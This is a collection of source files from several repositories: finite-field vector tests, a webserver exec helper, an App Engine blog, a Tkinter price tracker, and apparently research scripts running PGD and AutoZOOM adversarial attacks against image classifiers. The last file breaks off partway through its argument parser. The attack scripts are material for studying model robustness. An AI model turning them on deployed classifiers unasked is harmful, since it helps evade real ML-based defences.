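assert rust_module_name("ext.rust_linear_algebra") == "linear_algebra"
assert rust_module_name("ext.rust_algebra.adem") == "algebra.adem"
```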
#### File: python_ext/test/test_FpVector.py
```python
import pytest
import random
from fp_linear_algebra import FpVector
primes = [2, 3, 5, 7, 11]
dimensions = [5, 10, 33, 65, 1000]
repeats = 1000
class TestFpVector:
def setup_class(self):
pass
@pytest.mark.parametrize("dimension", dimensions)
@pytest.mark.parametrize("p", primes)
def test_freed(self, p, dimension):
v = FpVector(p, dimension)
w = FpVector(p, dimension)
v.free()
assert str(v) == "FreedVector"
with pytest.raises(ReferenceError):
v[0]
with pytest.raises(ReferenceError):
v[-1]
with pytest.raises(ReferenceError):
v.add(w, 1)
with pytest.raises(ReferenceError):
w.add(v, 1)
with pytest.raises(ReferenceError):
v.add_basis_element(2, 1)
with pytest.raises(ReferenceError):
v.assign(w)
with pytest.raises(ReferenceError):
w.assign(v)
with pytest.raises(ReferenceError):
v.dimension()
with pytest.raises(ReferenceError):
v.free()
with pytest.raises(ReferenceError):
v.is_zero()
with pytest.raises(ReferenceError):
v.is_zero_pure()
with pytest.raises(ReferenceError):
v.set_to_zero()
with pytest.raises(ReferenceError):
v.set_to_zero_pure()
with pytest.raises(ReferenceError):
v.to_list()
@pytest.mark.parametrize("dimension", dimensions)
@pytest.mark.parametrize("p", primes)
def test_to_from_list(self, p, dimension):
list = [random.randint(0,p-1) for _ in range(dimension)]
v = FpVector.from_list(p, list)
result = v.to_list()
v.free()
assert list == result
@pytest.mark.parametrize("dimension", [10])
@pytest.mark.parametrize("p", [3])
def test_pack_get(self, p, dimension):
list = [random.randint(0,p-1) for x in range(dimension)]
vector = FpVector.from_list(p, list)
for i in range(dimension):
assert vector[i] == list[i]
assert vector[-i-1] == list[-i-1]
with pytest.raises(IndexError):
vector[dimension]
with pytest.raises(IndexError):
vector[-dimension-1]
vector.free()
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_set_get(self, p, dim):
v = FpVector(p, dim)
k = [0] * dim
for i in range(repeats):
index = random.randint(0, dim-1)
value = random.randint(0, p-1)
assert v[index] == k[index]
k[index] = value
v[index] = value
assert v[index] == k[index]
result = v.to_list()
v.free()
assert result == k
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_assign(self, p, dim):
k = [random.randint(0,p-1) for x in range(dim)]
l = [random.randint(0,p-1) for x in range(dim)]
v = FpVector.from_list(p, k)
w = FpVector.from_list(p, l)
v.assign(w)
result = v.to_list()
v.free()
w.free()
assert result == l
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_self_assign(self, p, dim):
k = [random.randint(0,p-1) for x in range(dim)]
v = FpVector.from_list(p, k)
v.assign(v)
result = v.to_list()
assert result == k
@pytest.mark.parametrize("p", primes)
def test_zero_dimensional_vec(self, p):
v = FpVector(p, 0)
w = FpVector(p, 0)
v.add(w, 1)
v.scale(3)
v.assign(w)
with pytest.raises(IndexError):
v[0]
with pytest.raises(IndexError):
v[-1]
with pytest.raises(IndexError):
v[2]
v.free()
@pytest.mark.parametrize("p", primes)
def test_index_zero_dimensional_vec(self, p):
pass
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_addBasisElement(self, p, dim):
v = FpVector(p, dim)
k = [0] * dim
for i in range(repeats):
index = random.randint(0, dim-1)
value = random.randint(0, p-1)
k[index] += value
k[index] = k[index] % p
v.add_basis_element(index, value)
result = v.to_list()
v.free()
assert result == k
    def atest_add(self, p, v, w):
        # Disabled helper sketch: element-wise mod-p addition of two coefficient lists.
        result = []
        for (a, b) in zip(v, w):
            result.append((a + b) % p)
        return result
```
#### File: webserver/spectralsequences_webserver/utils.py
```python
import pathlib
import sys
def exec_file_if_exists(path, globals, locals):
if path.is_file():
code = compile(path.read_text(), path, "exec")
exec(code, globals, locals)
def exec_file(path, globals, locals):
code = compile(path.read_text(), path, "exec")
exec(code, globals, locals)
def bind(instance, func, as_name=None):
"""
Bind the function *func* to *instance*, with either provided name *as_name*
or the existing name of *func*. The provided *func* should accept the
instance as the first argument, i.e. "self".
"""
if as_name is None:
as_name = func.__name__
bound_method = func.__get__(instance, instance.__class__)
setattr(instance, as_name, bound_method)
return bound_method
``` |
{
"source": "joeyb/joeyb-blog",
"score": 2
} |
#### File: joeyb-blog/handlers/blog.py
```python
import datetime
import config
import PyRSS2Gen
from google.appengine.ext import webapp
from models import blog
import view
class IndexHandler(webapp.RequestHandler):
def get(self):
query = blog.Post.all()
query.order('-pub_date')
template_values = {'page_title': 'Home',
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class PostHandler(webapp.RequestHandler):
def get(self, year, month, day, slug):
year = int(year)
month = int(month)
day = int(day)
# Build the time span to check for the given slug
start_date = datetime.datetime(year, month, day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to check for slug uniqueness in the specified time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.filter('slug = ', slug)
post = query.get()
if post == None:
page = view.Page()
page.render_error(self, 404)
else:
template_values = {
'post': post,
}
page = view.Page()
page.render(self, 'templates/blog/post.html', template_values)
class TagHandler(webapp.RequestHandler):
def get(self, tag):
query = blog.Post.all()
query.filter('tags = ', tag)
query.order('-pub_date')
template_values = {'page_title': 'Posts tagged "%s"' % (tag),
'page_description': 'Posts tagged "%s"' % (tag),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class YearHandler(webapp.RequestHandler):
def get(self, year):
year = int(year)
# Build the time span to check for posts
start_date = datetime.datetime(year, 1, 1)
end_date = datetime.datetime(year + 1, 1, 1)
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.order('-pub_date')
template_values = {'page_title': 'Yearly Post Archive: %d' % (year),
'page_description': 'Yearly Post Archive: %d' % (year),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class MonthHandler(webapp.RequestHandler):
def get(self, year, month):
year = int(year)
month = int(month)
# Build the time span to check for posts
start_date = datetime.datetime(year, month, 1)
end_year = year if month < 12 else year + 1
end_month = month + 1 if month < 12 else 1
end_date = datetime.datetime(end_year, end_month, 1)
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.order('-pub_date')
month_text = start_date.strftime('%B %Y')
template_values = {'page_title': 'Monthly Post Archive: %s' % (month_text),
'page_description': 'Monthly Post Archive: %s' % (month_text),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class DayHandler(webapp.RequestHandler):
def get(self, year, month, day):
year = int(year)
month = int(month)
day = int(day)
# Build the time span to check for posts
start_date = datetime.datetime(year, month, day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.order('-pub_date')
day_text = start_date.strftime('%x')
template_values = {'page_title': 'Daily Post Archive: %s' % (day_text),
'page_description': 'Daily Post Archive: %s' % (day_text),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class RSS2Handler(webapp.RequestHandler):
def get(self):
query = blog.Post.all()
query.order('-pub_date')
posts = query.fetch(10)
rss_items = []
for post in posts:
item = PyRSS2Gen.RSSItem(title=post.title,
link="%s%s" % (config.SETTINGS['url'], post.get_absolute_url()),
description=post.excerpt_html or post.body_html,
guid=PyRSS2Gen.Guid("%s%s" % (config.SETTINGS['url'], post.get_absolute_url())),
pubDate=post.pub_date
)
rss_items.append(item)
rss = PyRSS2Gen.RSS2(title=config.SETTINGS['title'],
link=config.SETTINGS['url'],
description=config.SETTINGS['description'],
lastBuildDate=datetime.datetime.now(),
items=rss_items
)
rss_xml = rss.to_xml()
self.response.headers['Content-Type'] = 'application/rss+xml'
self.response.out.write(rss_xml)
```
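Several handlers above (PostHandler, DayHandler, and the slug check in the model below) rely on the same one-day window trick: bound `pub_date` by midnight of the requested day and midnight of the next day. A tiny standalone sketch of that computation, with an arbitrary example date:

```python
# Sketch of the one-day window used for the pub_date range filters above.
import datetime

def day_bounds(year, month, day):
    start = datetime.datetime(year, month, day)
    end = start + datetime.timedelta(days=1)
    return start, end   # used as: pub_date >= start AND pub_date < end

start, end = day_bounds(2010, 5, 17)   # arbitrary example date
assert end - start == datetime.timedelta(days=1)
```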
#### File: joeyb/joeyb-blog/main.py
```python
import config
import os
import sys
# Force sys.path to have our own directory first, so we can import from it.
sys.path.insert(0, config.APP_ROOT_DIR)
sys.path.insert(1, os.path.join(config.APP_ROOT_DIR, 'externals'))
import wsgiref.handlers
from google.appengine.ext import webapp
from handlers import blog, admin, error
def main():
application = webapp.WSGIApplication([('/', blog.IndexHandler),
('/blog/rss2', blog.RSS2Handler),
('/blog/tag/([-\w]+)', blog.TagHandler),
('/blog/(\d{4})', blog.YearHandler),
('/blog/(\d{4})/(\d{2})', blog.MonthHandler),
('/blog/(\d{4})/(\d{2})/(\d{2})', blog.DayHandler),
('/blog/(\d{4})/(\d{2})/(\d{2})/([-\w]+)', blog.PostHandler),
('/admin/clear-cache', admin.ClearCacheHandler),
('/admin/post/create', admin.CreatePostHandler),
('/admin/post/edit/(\d{4})/(\d{2})/(\d{2})/([-\w]+)', admin.EditPostHandler),
# If we make it this far then the page we are looking
# for does not exist
('/.*', error.Error404Handler),
],
debug=True)
wsgiref.handlers.CGIHandler().run(application)
if __name__ == '__main__':
main()
```
#### File: joeyb-blog/models/blog.py
```python
import datetime
import re
import markdown
from google.appengine.ext import db
from google.appengine.api import memcache
def slugify(value):
"""
Adapted from Django's django.template.defaultfilters.slugify.
"""
import unicodedata
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '', value).strip().lower())
return re.sub('[-\s]+', '-', value)
class Post(db.Model):
title = db.StringProperty()
slug = db.StringProperty()
pub_date = db.DateTimeProperty(auto_now_add=True)
author = db.UserProperty(auto_current_user_add=True)
excerpt = db.TextProperty(default=None)
body = db.TextProperty()
excerpt_html = db.TextProperty(default=None)
body_html = db.TextProperty()
tags = db.StringListProperty()
def get_absolute_url(self):
return "/blog/%04d/%02d/%02d/%s" % (self.pub_date.year,
self.pub_date.month,
self.pub_date.day,
self.slug)
def get_edit_url(self):
return "/admin/post/edit/%04d/%02d/%02d/%s" % (self.pub_date.year,
self.pub_date.month,
self.pub_date.day,
self.slug)
def put(self):
"""
Make sure that the slug is unique for the given date before
the data is actually saved.
"""
# Delete the cached archive list if we are saving a new post
if not self.is_saved():
memcache.delete('archive_list')
# Delete the cached tag list whenever a post is created/updated
memcache.delete('tag_list')
self.test_for_slug_collision()
self.populate_html_fields()
key = super(Post, self).put()
return key
def test_for_slug_collision(self):
# Build the time span to check for slug uniqueness
start_date = datetime.datetime(self.pub_date.year,
self.pub_date.month,
self.pub_date.day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to check for slug uniqueness in the specified time span
query = Post.all(keys_only=True)
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.filter('slug = ', self.slug)
# Get the Post Key that match the given query (if it exists)
post = query.get()
# If any slug matches were found then an exception should be raised
if post and (not self.is_saved() or self.key() != post):
raise SlugConstraintViolation(start_date, self.slug)
def populate_html_fields(self):
# Setup Markdown with the code highlighter
md = markdown.Markdown(extensions=['codehilite'])
# Convert the excerpt and body Markdown into html
if self.excerpt != None:
self.excerpt_html = md.convert(self.excerpt)
if self.body != None:
self.body_html = md.convert(self.body)
class SlugConstraintViolation(Exception):
def __init__(self, date, slug):
super(SlugConstraintViolation, self).__init__("Slug '%s' is not unique for date '%s'." % (slug, date.date()))
``` |
{
"source": "Joey-Boivin/newegg-tracker",
"score": 3
} |
#### File: App/Graphic/app.py
```python
from tkinter import *
from tkinter import ttk
import webbrowser
from PIL import ImageTk, Image #Tkinter's image management is outdated
root = Tk()
root.config(bg="#2D2D2D")
root.title("Newegg tracker by Joey-Boivin on GitHub")
root.geometry("1050x900")
main_frame = Frame(root)
main_frame.pack(fill=BOTH, expand=1)
my_canvas = Canvas(main_frame)
my_canvas.pack(side=LEFT, fill=BOTH, expand=1)
my_scrollbar = ttk.Scrollbar(main_frame, orient=VERTICAL, command=my_canvas.yview)
my_scrollbar.pack(side=RIGHT, fill=Y)
my_canvas.configure(bg='#2D2D2D', yscrollcommand=my_scrollbar.set)
my_canvas.bind('<Configure>', lambda e: my_canvas.configure(scrollregion=my_canvas.bbox('all')))
second_frame = Frame(my_canvas)
second_frame.config(bg='#2D2D2D')
my_canvas.create_window((0,0), window=second_frame, anchor='nw')
class Application:
"""
This is the class containing the graphical user interface.
"""
def __init__(self, data:dict):
self.data = data
icons, price_widgets, name_widgets, meta_widgets, button_widgets = self.create_widgets()
self.show_widgets(icons, price_widgets, name_widgets, meta_widgets, button_widgets)
def create_widgets(self):
"""
Creates all the widgets for the gui, including icons, name labels,
metadata about the items, and a "show on Newegg" button.
"""
icons = []
price_widgets = []
name_widgets = []
meta_widgets = []
newegg_button_widgets = []
for tag, _data in self.data['items'].items():
path = f'./Graphic/Images/{_data["img-token"]}.png'
img = ImageTk.PhotoImage(Image.open(path).resize((100,100)))
icons.append(img)
price = list(_data['history'].values())[-1] #last value
price_widget = Label(second_frame, text=price, bg='#2D2D2D', fg='white')
price_widgets.append(price_widget)
metadata = _data['metadata']
display = ""
if metadata:
for key, value in metadata.items():
display += str(key) + ': ' + str(value)
if len(metadata.items()) > 1:
display += '\n'
display = Label(second_frame, text=display, bg='#2D2D2D', fg='white')
meta_widgets.append(display)
name = _data['product-name']
name_widget = Label(second_frame, text=name, bg='#2D2D2D', fg='white')
name_widgets.append(name_widget)
newegg_button = Button(second_frame, text='See on Newegg.ca', bg='Black', fg='white', command=lambda tag=tag: self.show_on_newegg(tag))
newegg_button_widgets.append(newegg_button)
return icons, price_widgets, name_widgets, meta_widgets, newegg_button_widgets
def show_widgets(
self, icons:list, price_widgets:list,
name_widgets:list, meta_widgets:list, button_widgets:list
):
"""
Shows the widgets for the gui
"""
for i in range(int(self.data['number-of-items'])):
panel = Label(second_frame, image=icons[i])
panel.grid(row=i, column=0, padx = '50', pady='10')
name_widgets[i].grid(row=i, column=1, padx = '50', pady='10')
price_widgets[i].grid(row=i,column=2, padx = '50', pady='10')
meta_widgets[i].grid(row=i,column=3, padx = '50', pady='10')
button_widgets[i].grid(row=i, column=4, padx = '40', pady='10')
root.mainloop()
@staticmethod
def show_on_newegg(tag:str):
"""
Opens a new tab on Newegg.ca the tracked item.
"""
        webbrowser.open_new(f'https://www.newegg.ca/{tag}')
``` |
{
"source": "joeybose/Adversarial-Example-Games",
"score": 2
} |
#### File: Adversarial-Example-Games/attacks/pgd.py
```python
from __future__ import print_function
import os
import argparse
import ipdb
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import load_mnist
from cnn_models import LeNet as Net
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from advertorch.context import ctx_noparamgrad_and_eval
from advertorch.test_utils import LeNet5
from advertorch_examples.utils import get_mnist_train_loader
from advertorch_examples.utils import get_mnist_test_loader
from advertorch.attacks import Attack
from advertorch.attacks import LinfPGDAttack, L2PGDAttack
class PGDAttack(Attack):
def __init__(self, args, model, nb_iter,
loss_fn=nn.CrossEntropyLoss(reduction="sum")):
super(PGDAttack, self).__init__(args, model, nb_iter, loss_fn)
self.args = args
self.model = model
if args.attack_ball == 'Linf':
self.adversary = LinfPGDAttack(self.model, loss_fn=loss_fn,
eps=args.epsilon, nb_iter=nb_iter,
eps_iter=0.01, rand_init=True,
clip_min=args.clip_min,clip_max=args.clip_max,
targeted=False)
elif args.attack_ball == 'L2':
self.adversary = L2PGDAttack(self.model, loss_fn=loss_fn,
eps=args.epsilon, nb_iter=nb_iter,
eps_iter=0.01, rand_init=True,
clip_min=args.clip_min,clip_max=args.clip_max,
targeted=False)
else:
raise NotImplementedError
def train(self, train_loader, test_loader, l_test_classifiers, l_train_classif=None):
pass
def perturb(self, x, target):
advcorrect, clncorrect, test_clnloss, test_advloss = 0, 0, 0, 0
x = x.to(self.args.dev)
target = target.to(self.args.dev)
with torch.no_grad():
output = self.model(x)
test_clnloss += F.cross_entropy(
output, target, reduction='sum').item()
pred = output.max(1, keepdim=True)[1]
clncorrect += pred.eq(target.view_as(pred)).sum().item()
advdata = self.adversary.perturb(x, target)
with torch.no_grad():
output = self.model(advdata)
test_advloss += F.cross_entropy(
output, target, reduction='sum').item()
pred = output.max(1, keepdim=True)[1]
advcorrect += pred.eq(target.view_as(pred)).sum().item()
        print('Clean loss: {:.4f}, '
              'Clean acc: {}/{} ({:.2f}%)\n'.format(test_clnloss, clncorrect,
                                                    len(x), 100. * clncorrect /
                                                    len(x)))
print('Adv loss: {:.4f},'
'Adv acc: {}/{} ({:.2f}%)\n'.format( test_advloss, advcorrect,
len(x), 100. * advcorrect /
len(x)))
```
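A minimal driver sketch for the `PGDAttack` wrapper above, assuming `PGDAttack` and `Net` (the LeNet import at the top of the file) are in scope. The `args` namespace only fills in the attributes the constructor actually reads (`attack_ball`, `epsilon`, `clip_min`, `clip_max`, `dev`); the data batch is left as a placeholder.

```python
# Hypothetical usage sketch; model and data are placeholders.
from types import SimpleNamespace
import torch

args = SimpleNamespace(attack_ball='Linf', epsilon=0.3, clip_min=0.0, clip_max=1.0,
                       dev=torch.device('cuda' if torch.cuda.is_available() else 'cpu'))
model = Net().to(args.dev)            # LeNet, imported as Net at the top of the file
attack = PGDAttack(args, model, nb_iter=40)
# x, y = next(iter(test_loader))      # any (images, labels) batch from an MNIST loader
# attack.perturb(x, y)                # prints clean and adversarial accuracy for the batch
```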
#### File: Adversarial-Example-Games/attacks/run_autozoom.py
```python
import argparse
import glob
import json
import os
import os.path as osp
import random
import glog as log
import numpy as np
import torch
from torch.nn import functional as F
import torch.nn as nn
import torch.autograd as autograd
from autozoom_attack import ZOO, ZOO_AE, AutoZOOM_BiLIN, AutoZOOM_AE
from nattack import weights_init
from codec import Codec
# from autozoom_dataset.dataset_loader_maker import DataLoaderMaker
import sys
sys.path.append("..") # Adds higher directory to python modules path.
from utils.utils import *
from cnn_models.vgg_robustnet import VGG_noisy
from cnn_models import LeNet as Net
from cnn_models import VGG
from classifiers import load_all_classifiers, load_list_classifiers, load_dict_classifiers
from eval import baseline_transfer, baseline_eval_classifier
import ipdb
PY_ROOT = "./"
IMAGE_SIZE = {"cifar":(32,32), "CIFAR-100":(32,32), "ImageNet":(224,224),
"mnist":(28, 28), "FashionMNIST":(28,28), "SVHN":(32,32),
"TinyImageNet": (64,64)}
IN_CHANNELS = {"mnist":1, "FashionMNIST":1, "cifar":3, "ImageNet":3, "CIFAR-100":3, "SVHN":3, "TinyImageNet":3}
CLASS_NUM = {"mnist":10,"FashionMNIST":10, "cifar":10, "CIFAR-100":100, "ImageNet":1000, "SVHN":10, "TinyImageNet":200}
class AutoZoomAttackFramework(object):
def __init__(self, args, dataset_loader):
self.dataset_loader = dataset_loader
self.total_images = len(self.dataset_loader.dataset)
self.query_all = torch.zeros(self.total_images)
self.correct_all = torch.zeros_like(self.query_all) # number of images
self.not_done_all = torch.zeros_like(self.query_all) # always set to 0 if the original image is misclassified
self.success_all = torch.zeros_like(self.query_all)
self.success_query_all = torch.zeros_like(self.query_all)
self.not_done_loss_all = torch.zeros_like(self.query_all)
self.not_done_prob_all = torch.zeros_like(self.query_all)
def cw_loss(self, logit, label, target=None):
if target is not None:
# targeted cw loss: logit_t - max_{i\neq t}logit_i
_, argsort = logit.sort(dim=1, descending=True)
target_is_max = argsort[:, 0].eq(target).long()
second_max_index = target_is_max.long() * argsort[:, 1] + (1 - target_is_max).long() * argsort[:, 0]
target_logit = logit[torch.arange(logit.shape[0]), target]
second_max_logit = logit[torch.arange(logit.shape[0]), second_max_index]
return target_logit - second_max_logit
else:
# untargeted cw loss: max_{i\neq y}logit_i - logit_y
_, argsort = logit.sort(dim=1, descending=True)
gt_is_max = argsort[:, 0].eq(label).long()
second_max_index = gt_is_max.long() * argsort[:, 1] + (1 - gt_is_max).long() * argsort[:, 0]
gt_logit = logit[torch.arange(logit.shape[0]), label]
second_max_logit = logit[torch.arange(logit.shape[0]), second_max_index]
return second_max_logit - gt_logit
def make_adversarial_examples(self, batch_index, images, true_labels, args, attacker, target_model, codec):
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
# log ae info
decode_img = codec(images)
diff_img = (decode_img - images)
diff_mse = torch.mean(diff_img.view(-1).pow(2)).item()
print("[AE] MSE:{:.4f}".format(diff_mse))
batch_size = 1
selected = torch.arange(batch_index * batch_size,
                                (batch_index + 1) * batch_size)  # indices of all images in this batch
if args.attack_type == "targeted":
if args.target_type == "random":
with torch.no_grad():
logit = target_model(images)
target_labels = torch.randint(low=0, high=CLASS_NUM[args.dataset], size=true_labels.size()).long().cuda()
invalid_target_index = target_labels.eq(true_labels)
while invalid_target_index.sum().item() > 0:
target_labels[invalid_target_index] = torch.randint(low=0, high=logit.shape[1],
size=target_labels[
invalid_target_index].shape).long().cuda()
invalid_target_index = target_labels.eq(true_labels)
elif args.target_type == 'least_likely':
with torch.no_grad():
logit = target_model(images)
target_labels = logit.argmin(dim=1)
else:
target_labels = torch.fmod(true_labels + 1, CLASS_NUM[args.dataset])
else:
target_labels = None
print("Begin attack batch {}!".format(batch_index))
with torch.no_grad():
adv_images, stats_info = attacker.attack(images, true_labels, target_labels)
query = stats_info["query"]
correct = stats_info["correct"]
not_done = stats_info["not_done"]
success = stats_info["success"]
success_query = stats_info["success_query"]
not_done_prob = stats_info["not_done_prob"]
adv_logit = stats_info["adv_logit"]
adv_loss = self.cw_loss(adv_logit, true_labels, target_labels)
not_done_loss = adv_loss * not_done
return success, query, adv_images
def attack_dataset_images(self, args, attacker, arch_name, target_model,
codec, l_test_classif_paths, adv_models, result_dump_path='.'):
success_list, query_list, adv_img_list = [], [], []
for batch_idx, data_tuple in enumerate(self.dataset_loader):
print(batch_idx)
if batch_idx > args.num_attack:
break
if args.dataset == "ImageNet":
if args.input_size >= 299:
images, true_labels = data_tuple[1], data_tuple[2]
else:
images, true_labels = data_tuple[0], data_tuple[2]
else:
images, true_labels = data_tuple[0], data_tuple[1]
if images.size(-1) != args.input_size:
images = F.interpolate(images, size=target_model.module.input_size[-1], mode='bilinear',align_corners=True)
success, query, adv_images = self.make_adversarial_examples(batch_idx, images.cuda(), true_labels.cuda(),
args, attacker, target_model, codec)
success_list.append(success)
adv_img_list.append([adv_images, true_labels])
avg_correct = sum(success_list) / float(len(success_list))
        print('Attack on {} finished ({} images)'.format(arch_name, self.total_images))
print(' avg correct: {:.4f}'.format(avg_correct.item()))
# print(' avg correct: {:.4f}'.format(self.correct_all.mean().item()))
        print(' avg not_done: {:.4f}'.format(self.not_done_all.mean().item()))  # how many images were not finished
if self.success_all.sum().item() > 0:
print(
' avg mean_query: {:.4f}'.format(self.success_query_all[self.success_all.byte()].mean().item()))
print(
' avg median_query: {:.4f}'.format(self.success_query_all[self.success_all.byte()].median().item()))
print(' max query: {}'.format(self.success_query_all[self.success_all.byte()].max().item()))
if self.not_done_all.sum().item() > 0:
print(
' avg not_done_loss: {:.4f}'.format(self.not_done_loss_all[self.not_done_all.byte()].mean().item()))
print(
' avg not_done_prob: {:.4f}'.format(self.not_done_prob_all[self.not_done_all.byte()].mean().item()))
print('Saving results to {}'.format(result_dump_path))
# meta_info_dict = {"avg_correct": self.correct_all.mean().item(),
# "avg_not_done": self.not_done_all.mean().item(),
# "mean_query": self.success_query_all[self.success_all.byte()].mean().item(),
# "median_query": self.success_query_all[self.success_all.byte()].median().item(),
# "max_query": self.success_query_all[self.success_all.byte()].max().item(),
# "not_done_loss": self.not_done_loss_all[self.not_done_all.byte()].mean().item(),
# "not_done_prob": self.not_done_prob_all[self.not_done_all.byte()].mean().item()}
# meta_info_dict['args'] = vars(args)
# with open(result_dump_path, "w") as result_file_obj:
# json.dump(meta_info_dict, result_file_obj, indent=4, sort_keys=True)
print("done, write stats info to {}".format(result_dump_path))
if args.transfer:
baseline_transfer(args, attacker, args.attack_method, arch_name,
adv_img_list, l_test_classif_paths, adv_models)
def main(args, arch):
adv_models = None
train_loader, test_loader = create_loaders(args, root='../data')
if args.dataset == 'cifar':
args.nc, args.h, args.w = 3, 32, 32
args.input_size = 32
model, l_test_classif_paths = load_all_classifiers(args, load_archs=[args.source_arch])
model_type = args.source_arch
if args.target_arch is not None:
model_target, l_test_classif_paths = load_all_classifiers(args, load_archs=[args.target_arch])
model_type = args.target_arch
del model_target
torch.cuda.empty_cache()
elif args.dataset == 'mnist':
args.input_size = 28
if args.source_arch == 'natural':
model, l_test_classif_paths = load_all_classifiers(args, load_archs=["natural"])
model_type = 'natural'
elif args.source_arch == 'ens_adv':
adv_model_names = args.adv_models
adv_models = [None] * len(adv_model_names)
for i in range(len(adv_model_names)):
type = get_model_type(adv_model_names[i])
adv_models[i] = load_model(args, adv_model_names[i], type=type).to(args.dev)
path = os.path.join(args.dir_test_models, "pretrained_classifiers",
args.dataset, "ensemble_adv_trained", args.model)
model = load_model(args, args.model, type=args.type)
l_test_classif_paths = [path]
model_type = 'Ensemble Adversarial'
model.to(args.dev)
model.eval()
test_classifier(args, model, args.dev, test_loader, epoch=1)
print("Testing on %d Test Classifiers" %(len(l_test_classif_paths)))
# attack related settings
if args.attack_method == "zoo" or args.attack_method == "autozoom_bilin":
if args.img_resize is None:
args.img_resize = args.input_size
print("Argument img_resize is not set and not using autoencoder, set to image original size:{}".format(
args.img_resize))
codec = None
if args.attack_method == "zoo_ae" or args.attack_method == "autozoom_ae":
codec = Codec(args.input_size, IN_CHANNELS[args.dataset],
args.compress_mode, args.resize, use_tanh=args.use_tanh)
        codec.load_codec(args.codec_path)
codec.cuda()
decoder = codec.decoder
args.img_resize = decoder.input_shape[1]
print("Loading autoencoder: {}, set the attack image size to:{}".format(args.codec_path, args.img_resize))
# setup attack
if args.attack_method == "zoo":
blackbox_attack = ZOO(model, args.dataset, args)
elif args.attack_method == "zoo_ae":
blackbox_attack = ZOO_AE(model, args.dataset, args, decoder)
elif args.attack_method == "autozoom_bilin":
blackbox_attack = AutoZOOM_BiLIN(model, args.dataset, args)
elif args.attack_method == "autozoom_ae":
blackbox_attack = AutoZOOM_AE(model, args["dataset"], args, decoder)
target_str = "untargeted" if args.attack_type!="targeted" else "targeted_{}".format(args.target_type)
attack_framework = AutoZoomAttackFramework(args, test_loader)
attack_framework.attack_dataset_images(args, blackbox_attack, arch, model,
codec, l_test_classif_paths=l_test_classif_paths,
adv_models=adv_models)
model.cpu()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-a", "--attack_method", type=str, required=True,
choices=["zoo", "zoo_ae", "autozoom_bilin", "autozoom_ae"], help="the attack method")
parser.add_argument("-b", "--batch_size", type=int, default=1, help="the batch size for zoo, zoo_ae attack")
parser.add_argument("-c", "--init_const", type=float, default=1, help="the initial setting of the constant lambda")
parser.add_argument("-d", "--dataset", type=str, required=True, choices=["cifar", "CIFAR-100", "ImageNet", "mnist", "FashionMNIST"])
parser.add_argument("-m", "--max_iterations", type=int, default=None, help="set 0 to use the default value")
parser.add_argument("-n", "--num_attack", type=int, default=100,
help="Number of images to attack")
parser.add_argument("-p", "--print_every", type=int, default=100,
help="print information every PRINT_EVERY iterations")
parser.add_argument("--attack_type", default="untargeted", choices=["targeted", "untargeted"],
help="the type of attack")
parser.add_argument('--transfer', action='store_true')
parser.add_argument("--early_stop_iters", type=int, default=100,
help="print objs every EARLY_STOP_ITER iterations, 0 is maxiter//10")
parser.add_argument("--confidence", default=0, type=float, help="the attack confidence")
parser.add_argument("--codec_path", default=None, type=str, help="the coedec path, load the default codec is not set")
parser.add_argument("--target_type", type=str, default="increment", choices=['random', 'least_likely',"increment"],
help="if set, choose random target, otherwise attack every possible target class, only works when ATTACK_TYPE=targeted")
parser.add_argument("--num_rand_vec", type=int, default=1,
help="the number of random vector for post success iteration")
parser.add_argument("--img_offset", type=int, default=0,
help="the offset of the image index when getting attack data")
parser.add_argument("--img_resize", default=None, type=int,
help="this option only works for ATTACK METHOD zoo and autozoom_bilin")
parser.add_argument("--epsilon", type=float, default=4.6, help="the maximum threshold of L2 constraint")
parser.add_argument("--resize", default=None,type=int, help="this option only works for the preprocess resize of images")
parser.add_argument("--switch_iterations", type=int, default=None,
help="the iteration number for dynamic switching")
parser.add_argument("--compress_mode", type=int, default=None,
help="specify the compress mode if autoencoder is used")
parser.add_argument('--test_archs', action="store_true")
parser.add_argument('--use_tanh', default=False, action="store_true")
parser.add_argument('--source_arch', default="res18",
help="The architecture we want to attack on CIFAR.")
parser.add_argument('--target_arch', default=None,
help="The architecture we want to blackbox transfer to on CIFAR.")
parser.add_argument('--noise', type=float, default=0.3)
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate for the generator (default: 0.01)')
parser.add_argument('--seed', default=0, type=int, help='random seed')
parser.add_argument('--robust_load_path', type=str, default='../../Nattack/all_models/robustnet/noise_0.3.pth')
parser.add_argument('--load_path', type=str,
default='../pretrained_classifiers/cifar/VGG16/model_1.pt')
parser.add_argument('--robust_model_path', type=str,
default="../madry_challenge_models/mnist/adv_trained/mnist_lenet5_advtrained.pt")
parser.add_argument('--dir_test_models', type=str,
default="../",
help="The path to the directory containing the classifier models for evaluation.")
parser.add_argument('--train_set', default='test',
choices=['train_and_test','test','train'],
